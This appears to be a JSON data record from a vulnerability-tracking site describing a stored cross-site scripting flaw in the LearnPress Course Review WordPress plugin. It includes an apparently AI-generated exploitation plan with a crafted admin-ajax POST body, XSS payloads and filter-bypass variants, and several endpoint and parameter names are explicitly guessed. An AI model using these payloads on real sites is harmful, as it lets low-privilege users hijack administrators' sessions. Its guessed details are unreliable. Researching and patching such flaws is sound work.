[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZH-v87Fy1tqJnximyS2QDxlo41jeK54DE7oxF7y4ZIg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2026-24361","learnpress-course-review-authenticated-learnpress-student-stored-cross-site-scripting","LearnPress – Course Review \u003C= 4.1.9 - Authenticated (Learnpress student+) Stored Cross-Site Scripting","The LearnPress – Course Review plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with learnpress student-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","learnpress-course-review",null,"\u003C=4.1.9","4.2.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-15 00:00:00","2026-01-27 19:39:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F924b6413-79f2-4f8f-8d73-74dbfb48550c?source=api-prod",13,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-24361\n\n## 1. Vulnerability Summary\nThe **LearnPress – Course Review** plugin (\u003C= 4.1.9) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sufficiently sanitize user-supplied input when submitting a course review and subsequently fails to escape that data when rendering it on course pages. This allows an attacker with \"Student\" level privileges or higher to inject malicious scripts that execute in the context of any user (including administrators) viewing the course reviews.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action**: `lp_review_course` (inferred from plugin naming conventions and common LearnPress patterns)\n*   **Vulnerable Parameter**: `review_content` and\u002For `review_title` (inferred)\n*   **Authentication**: Required (LearnPress Student role or higher)\n*   **Preconditions**: \n    1.  LearnPress and LearnPress – Course Review must be active.\n    2.  At least one Course must exist and be open for reviews.\n    3.  The attacker must have a user account with the `lp_student` role.\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin registers an AJAX handler in `inc\u002Fclass-lp-course-review.php` (or similar) using `add_action( 'wp_ajax_lp_review_course', ... )`.\n2.  **Input Handling**: The callback function (e.g., `add_review()`) retrieves review data from `$_POST['review_content']` and `$_POST['review_title']`.\n3.  **Storage**: The data is stored in the database, likely using `wp_insert_comment()` (with `comment_type` set to `review`) or as Post Meta, without rigorous sanitization (e.g., missing `wp_kses`).\n4.  **Rendering**: When a user views the course page, the plugin retrieves these reviews and echoes the content in a template file (e.g., `templates\u002Fcourse-reviews.php` or inside a `review-item` loop) without using `esc_html()` or `wp_kses_post()`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely enqueues a script and localizes the required AJAX configuration, including a nonce.\n\n1.  **Identify Trigger**: Course reviews are typically displayed on the single course page.\n2.  **Setup Content**: Create a course and ensure the Review tab is enabled.\n3.  **Navigate**: Use `browser_navigate` to visit the URL of the created course as a logged-in Student.\n4.  **Extract**: Use `browser_eval` to extract the nonce from the localized JavaScript object.\n    *   **Inferred Variable**: `window.lp_course_review_config` or `window.lp_course_review`.\n    *   **Inferred Key**: `nonce` or `_lp_course_review_nonce`.\n    *   **Command**: `browser_eval(\"window.lp_course_review?.nonce\")`\n\n## 5. Exploitation Strategy\nThe goal is to submit a review containing a script payload as a Student user.\n\n1.  **Authentication**: Log in as a user with the `lp_student` role.\n2.  **Preparation**: Navigate to a course page to obtain the valid `course_id` and the `nonce`.\n3.  **Request**: Send a POST request to `admin-ajax.php`.\n    *   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method**: `POST`\n    *   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body**:\n        ```\n        action=lp_review_course\n        course_id=[COURSE_ID]\n        review_title=Great Course \u003Cscript>alert('XSS_TITLE')\u003C\u002Fscript>\n        review_content=This is a review \u003Cimg src=x onerror=alert('XSS_CONTENT')>\n        rating=5\n        _lp_course_review_nonce=[NONCE]\n        ```\n4.  **Verification**: Navigate to the course page as an Administrator and check for the execution of the `alert()` payloads.\n\n## 6. Test Data Setup\n1.  **Plugin Installation**: Ensure `learnpress` and `learnpress-course-review` (v4.1.9) are active.\n2.  **Create Student**: \n    `wp user create student student@example.com --role=lp_student --user_pass=password`\n3.  **Create Course**: \n    `wp post create --post_type=lp_course --post_title=\"Vulnerable Course\" --post_status=publish`\n4.  **Enroll Student** (Optional, depending on plugin settings):\n    `wp eval \"learn_press_enroll_user_in_course(get_user_by('email', 'student@example.com')->ID, [COURSE_ID]);\"`\n5.  **Review Settings**: Ensure \"Enable Course Review\" is checked in LearnPress settings.\n\n## 7. Expected Results\n*   The AJAX request should return a success response (likely JSON `{\"success\": true}`).\n*   When any user views the \"Vulnerable Course\" page, the browser should execute the injected JavaScript, resulting in an alert box.\n*   The raw HTML of the course review section will contain the unescaped tags: `\u003Cscript>alert('XSS_TITLE')\u003C\u002Fscript>`.\n\n## 8. Verification Steps\n1.  **Confirm Storage via CLI**:\n    `wp comment list --comment_type=review` (If reviews are comments)\n    OR\n    `wp post meta list [COURSE_ID]` (If reviews are stored in meta)\n2.  **Check for Unsanitized Content**:\n    `wp db query \"SELECT comment_content FROM wp_comments WHERE comment_type='review' ORDER BY comment_ID DESC LIMIT 1\"`\n3.  **HTTP Verification**:\n    Use `http_request` as an unauthenticated user or Admin to fetch the course page and grep for the payload string.\n\n## 9. Alternative Approaches\n*   **Payload Location**: If `review_content` is sanitized, try injecting into `review_title` or the `rating` parameter (if it is reflected as a string\u002Fattribute).\n*   **Bypass `wp_kses`**: If basic tags are allowed but incorrectly handled, try `\u003Csvg\u002Fonload=alert(1)>` or `\u003Cdetails open ontoggle=alert(1)>`.\n*   **AJAX Context**: Some LearnPress addons use a custom API route. If `admin-ajax.php` returns 400, search the source for `register_rest_route` to see if reviews are submitted via the REST API.","The LearnPress – Course Review plugin for WordPress (\u003C= 4.1.9) is vulnerable to Stored Cross-Site Scripting (XSS) due to a lack of input sanitization and output escaping on course reviews. Authenticated attackers with Student-level privileges can inject malicious scripts into review titles or content, which then execute in the context of any user viewing the course reviews.","To exploit this vulnerability, an attacker must be authenticated with at least the 'lp_student' role. First, the attacker navigates to a course page to retrieve a valid 'course_id' and the AJAX nonce (likely found in the localized 'lp_course_review_config' JavaScript object). Next, the attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the action set to 'lp_review_course'. The payload includes the course ID, the nonce, a rating, and the XSS payload (e.g., \u003Cscript>alert(1)\u003C\u002Fscript>) within the 'review_title' or 'review_content' parameters. Once submitted, the script is stored and will execute whenever a user, including an administrator, views the reviews on that course page.","gemini-3-flash-preview","2026-05-05 09:11:46","2026-05-05 09:13:33",{"type":32,"vulnerable_version":33,"fixed_version":11,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":36,"fixed_zip":37,"all_tags":38},"plugin","4.1.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flearnpress-course-review\u002Ftags\u002F4.1.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flearnpress-course-review.4.1.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flearnpress-course-review\u002Ftags\u002F4.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flearnpress-course-review.4.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flearnpress-course-review\u002Ftags"]